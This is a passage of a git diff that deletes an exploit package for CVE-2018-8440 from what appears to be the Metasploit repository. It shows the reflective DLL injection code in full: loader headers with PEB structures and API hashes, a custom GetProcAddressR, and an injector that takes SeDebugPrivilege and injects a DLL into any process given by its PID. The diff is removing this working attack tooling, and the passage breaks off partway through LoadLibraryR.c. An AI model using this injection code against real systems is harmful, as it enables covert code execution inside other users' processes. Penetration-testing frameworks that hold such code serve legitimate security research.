DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include - -#include "ReflectiveDLLInjection.h" - -// Enable this define to turn on OutputDebugString support -//#define ENABLE_OUTPUTDEBUGSTRING 1 - -// Enable this define to turn on locking of memory to prevent paging -#define ENABLE_STOPPAGING 1 - -#define EXITFUNC_SEH 0xEA320EFE -#define EXITFUNC_THREAD 0x0A2A1DE0 -#define EXITFUNC_PROCESS 0x56A2B5F0 - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); -typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define NTDLLDLL_HASH 0x3CFA685D - -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 -#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 - -#ifdef ENABLE_STOPPAGING -typedef LPVOID (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T ); -#define VIRTUALLOCK_HASH 0x0EF632F2 -#endif - -#ifdef ENABLE_OUTPUTDEBUGSTRING -typedef LPVOID (WINAPI * OUTPUTDEBUG)( LPCSTR ); -#define OUTPUTDEBUG_HASH 0x470D22BC -#endif - -#define IMAGE_REL_BASED_ARM_MOV32A 5 -#define IMAGE_REL_BASED_ARM_MOV32T 7 - -#define ARM_MOV_MASK (DWORD)(0xFBF08000) -#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) -#define ARM_MOVW 0xF2400000 -#define ARM_MOVT 0xF2C00000 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - -__forceinline DWORD _hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2018-8440/dll/src/exploit.h b/external/source/exploits/CVE-2018-8440/dll/src/exploit.h deleted file mode 100755 index cc5e83cf3e..0000000000 --- a/external/source/exploits/CVE-2018-8440/dll/src/exploit.h +++ /dev/null @@ -1,7 +0,0 @@ -#ifndef EXPLOIT_H -#define EXPLOIT_H - -extern "C" __declspec (dllexport) void testFunc(void); -//extern "C" __declspec (dllexport) void RunIt(void*); - -#endif \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/src/resource.h b/external/source/exploits/CVE-2018-8440/dll/src/resource.h deleted file mode 100755 index 3778ca06ce..0000000000 --- a/external/source/exploits/CVE-2018-8440/dll/src/resource.h +++ /dev/null @@ -1,16 +0,0 @@ -//{{NO_DEPENDENCIES}} -// Microsoft Visual C++ generated include file. -// Used by Resource.rc -// -#define IDR_RCDATA1 101 - -// Next default values for new objects -// -#ifdef APSTUDIO_INVOKED -#ifndef APSTUDIO_READONLY_SYMBOLS -#define _APS_NEXT_RESOURCE_VALUE 102 -#define _APS_NEXT_COMMAND_VALUE 40001 -#define _APS_NEXT_CONTROL_VALUE 1001 -#define _APS_NEXT_SYMED_VALUE 101 -#endif -#endif diff --git a/external/source/exploits/CVE-2018-8440/inject/inject.vcxproj b/external/source/exploits/CVE-2018-8440/inject/inject.vcxproj deleted file mode 100755 index bbefca3bc7..0000000000 --- a/external/source/exploits/CVE-2018-8440/inject/inject.vcxproj +++ /dev/null @@ -1,255 +0,0 @@ - - - - - Debug - ARM - - - Debug - Win32 - - - Debug - x64 - - - Release - ARM - - - Release - Win32 - - - Release - x64 - - - - {EEF3FD41-05D8-4A07-8434-EF5D34D76335} - inject - Win32Proj - - - - Application - v120 - MultiByte - true - - - Application - v120 - MultiByte - true - - - Application - v120 - Unicode - - - Application - v120 - Unicode - - - Application - v120 - MultiByte - true - - - Application - v120 - Unicode - - - - - - - - - - - - - - - - - - - - - - - - - <_ProjectFileVersion>11.0.50727.1 - - - $(SolutionDir)$(Configuration)\ - $(Configuration)\ - true - - - true - - - $(SolutionDir)$(Platform)\$(Configuration)\ - $(Platform)\$(Configuration)\ - true - - - $(SolutionDir)$(Configuration)\ - $(Configuration)\ - false - - - false - - - $(SolutionDir)$(Platform)\$(Configuration)\ - $(Platform)\$(Configuration)\ - false - - - - Disabled - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - Level3 - EditAndContinue - ../common - - - true - Console - MachineX86 - - - - - Disabled - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - - Level3 - EditAndContinue - ../common - - - true - Console - - - - - X64 - - - Disabled - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - EnableFastChecks - MultiThreadedDebugDLL - - Level3 - ProgramDatabase - ../common - - - true - Console - MachineX64 - - - - - MaxSpeed - true - WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - MultiThreaded - true - - Level3 - ProgramDatabase - ../common - - - true - Console - true - true - MachineX86 - - - - - MaxSpeed - true - WIN32;NDEBUG;_CONSOLE;WIN_ARM;%(PreprocessorDefinitions) - MultiThreaded - true - - - Level3 - ProgramDatabase - ../common - - - true - Console - true - true - $(OutDir)inject.arm.exe - %(AdditionalDependencies) - - - - - X64 - - - MaxSpeed - true - WIN64;NDEBUG;_CONSOLE;_WIN64;%(PreprocessorDefinitions) - MultiThreaded - true - - Level3 - ProgramDatabase - ../common - - - $(OutDir)inject.x64.exe - true - Console - true - true - MachineX64 - - - - - - - - - - - - - - - - diff --git a/external/source/exploits/CVE-2018-8440/inject/inject.vcxproj.filters b/external/source/exploits/CVE-2018-8440/inject/inject.vcxproj.filters deleted file mode 100755 index 5482d5ae49..0000000000 --- a/external/source/exploits/CVE-2018-8440/inject/inject.vcxproj.filters +++ /dev/null @@ -1,35 +0,0 @@ - - - - - {4FC737F1-C7A5-4376-A066-2A32D752A2FF} - cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx - - - {93995380-89BD-4b04-88EB-625FBE52EBFB} - h;hpp;hxx;hm;inl;inc;xsd - - - - - Source Files - - - Source Files - - - Source Files - - - - - Header Files - - - Header Files - - - Header Files - - - \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/inject/src/GetProcAddressR.c b/external/source/exploits/CVE-2018-8440/inject/src/GetProcAddressR.c deleted file mode 100755 index 2f10367b8c..0000000000 --- a/external/source/exploits/CVE-2018-8440/inject/src/GetProcAddressR.c +++ /dev/null @@ -1,116 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "GetProcAddressR.h" -//===============================================================================================// -// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which -// wont be able to resolve exported addresses in reflectivly loaded librarys. -FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ) -{ - UINT_PTR uiLibraryAddress = 0; - FARPROC fpResult = NULL; - - if( hModule == NULL ) - return NULL; - - // a module handle is really its base address - uiLibraryAddress = (UINT_PTR)hModule; - - __try - { - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiNameOrdinals = 0; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - PIMAGE_DATA_DIRECTORY pDataDirectory = NULL; - PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL; - - // get the VA of the modules NT Header - pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew); - - pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions ); - - // get the VA for the array of name pointers - uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals ); - - // test if we are importing by name or by ordinal... - if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 ) - { - // import by ordinal... - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) ); - - // resolve the address for this imported function - fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // import by name... - DWORD dwCounter = pExportDirectory->NumberOfNames; - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray )); - - // test if we have a match... - if( strcmp( cpExportedFunctionName, lpProcName ) == 0 ) - { - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // calculate the virtual address for the function - fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray )); - - // finish... - break; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - fpResult = NULL; - } - - return fpResult; -} -//===============================================================================================// diff --git a/external/source/exploits/CVE-2018-8440/inject/src/GetProcAddressR.h b/external/source/exploits/CVE-2018-8440/inject/src/GetProcAddressR.h deleted file mode 100755 index 102a41defb..0000000000 --- a/external/source/exploits/CVE-2018-8440/inject/src/GetProcAddressR.h +++ /dev/null @@ -1,36 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H -#define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ); -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2018-8440/inject/src/Inject.c b/external/source/exploits/CVE-2018-8440/inject/src/Inject.c deleted file mode 100755 index 9ef7509e8b..0000000000 --- a/external/source/exploits/CVE-2018-8440/inject/src/Inject.c +++ /dev/null @@ -1,120 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include -#include "LoadLibraryR.h" - -#pragma comment(lib,"Advapi32.lib") - -#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; } - -// Simple app to inject a reflective DLL into a process vis its process ID. -int main( int argc, char * argv[] ) -{ - HANDLE hFile = NULL; - HANDLE hModule = NULL; - HANDLE hProcess = NULL; - HANDLE hToken = NULL; - LPVOID lpBuffer = NULL; - DWORD dwLength = 0; - DWORD dwBytesRead = 0; - DWORD dwProcessId = 0; - TOKEN_PRIVILEGES priv = {0}; - -#ifdef _WIN64 - char * cpDllFile = "reflective_dll.x64.dll"; -#else -#ifdef WIN_X86 - char * cpDllFile = "reflective_dll.dll"; -#else WIN_ARM - char * cpDllFile = "reflective_dll.arm.dll"; -#endif -#endif - - do - { - // Usage: inject.exe [pid] [dll_file] - - if( argc == 1 ) - dwProcessId = GetCurrentProcessId(); - else - dwProcessId = atoi( argv[1] ); - - if( argc >= 3 ) - cpDllFile = argv[2]; - - hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); - if( hFile == INVALID_HANDLE_VALUE ) - BREAK_WITH_ERROR( "Failed to open the DLL file" ); - - dwLength = GetFileSize( hFile, NULL ); - if( dwLength == INVALID_FILE_SIZE || dwLength == 0 ) - BREAK_WITH_ERROR( "Failed to get the DLL file size" ); - - lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength ); - if( !lpBuffer ) - BREAK_WITH_ERROR( "Failed to get the DLL file size" ); - - if( ReadFile( hFile, lpBuffer, dwLength, &dwBytesRead, NULL ) == FALSE ) - BREAK_WITH_ERROR( "Failed to alloc a buffer!" ); - - if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) ) - { - priv.PrivilegeCount = 1; - priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; - - if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) ) - AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL ); - - CloseHandle( hToken ); - } - - hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId ); - if( !hProcess ) - BREAK_WITH_ERROR( "Failed to open the target process" ); - - hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, NULL ); - if( !hModule ) - BREAK_WITH_ERROR( "Failed to inject the DLL" ); - - printf( "[+] Injected the '%s' DLL into process %d.", cpDllFile, dwProcessId ); - - WaitForSingleObject( hModule, -1 ); - - } while( 0 ); - - if( lpBuffer ) - HeapFree( GetProcessHeap(), 0, lpBuffer ); - - if( hProcess ) - CloseHandle( hProcess ); - - return 0; -} \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/inject/src/LoadLibraryR.c b/external/source/exploits/CVE-2018-8440/inject/src/LoadLibraryR.c deleted file mode 100755 index 18b9e21ec4..0000000000 --- a/external/source/exploits/CVE-2018-8440/inject/src/LoadLibraryR.c +++ /dev/null @@ -1,233 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "LoadLibraryR.h" -//===============================================================================================// -DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress ) -{ - WORD wIndex = 0; - PIMAGE_SECTION_HEADER pSectionHeader = NULL; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - - pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew); - - pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader); - - if( dwRva < pSectionHeader[0].PointerToRawData ) - return dwRva; - - for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ ) - { - if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) ) - return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData ); - } - - return 0; -} -//===============================================================================================// -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ) -{ - UINT_PTR uiBaseAddress = 0; - UINT_PTR uiExportDir = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameOrdinals = 0; - DWORD dwCounter = 0; -#ifdef _WIN64 - DWORD dwMeterpreterArch = 2; -#else - // This will catch Win32 and WinRT. - DWORD dwMeterpreterArch = 1; -#endif - - uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer; - - // get the File Offset of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // currenlty we can only process a PE file which is the same type as the one this fuction has - // been compiled as, due to various offset in the PE structures being defined at compile time. - if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32 - { - if( dwMeterpreterArch != 1 ) - return 0; - } - else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64 - { - if( dwMeterpreterArch != 2 ) - return 0; - } - else - { - return 0; - } - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the File Offset of the export directory - uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress ); - - // get the File Offset for the array of name pointers - uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress ); - - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // get the File Offset for the array of name ordinals - uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress ); - - // get a counter for the number of exported functions... - dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames; - - // loop through all the exported functions to find the ReflectiveLoader - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress )); - - if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL ) - { - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // return the File Offset to the ReflectiveLoader() functions code... - return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress ); - } - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - return 0; -} -//===============================================================================================// -// Loads a DLL image from memory via its exported ReflectiveLoader function -HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ) -{ - HMODULE hResult = NULL; - DWORD dwReflectiveLoaderOffset = 0; - DWORD dwOldProtect1 = 0; - DWORD dwOldProtect2 = 0; - REFLECTIVELOADER pReflectiveLoader = NULL; - DLLMAIN pDllMain = NULL; - - if( 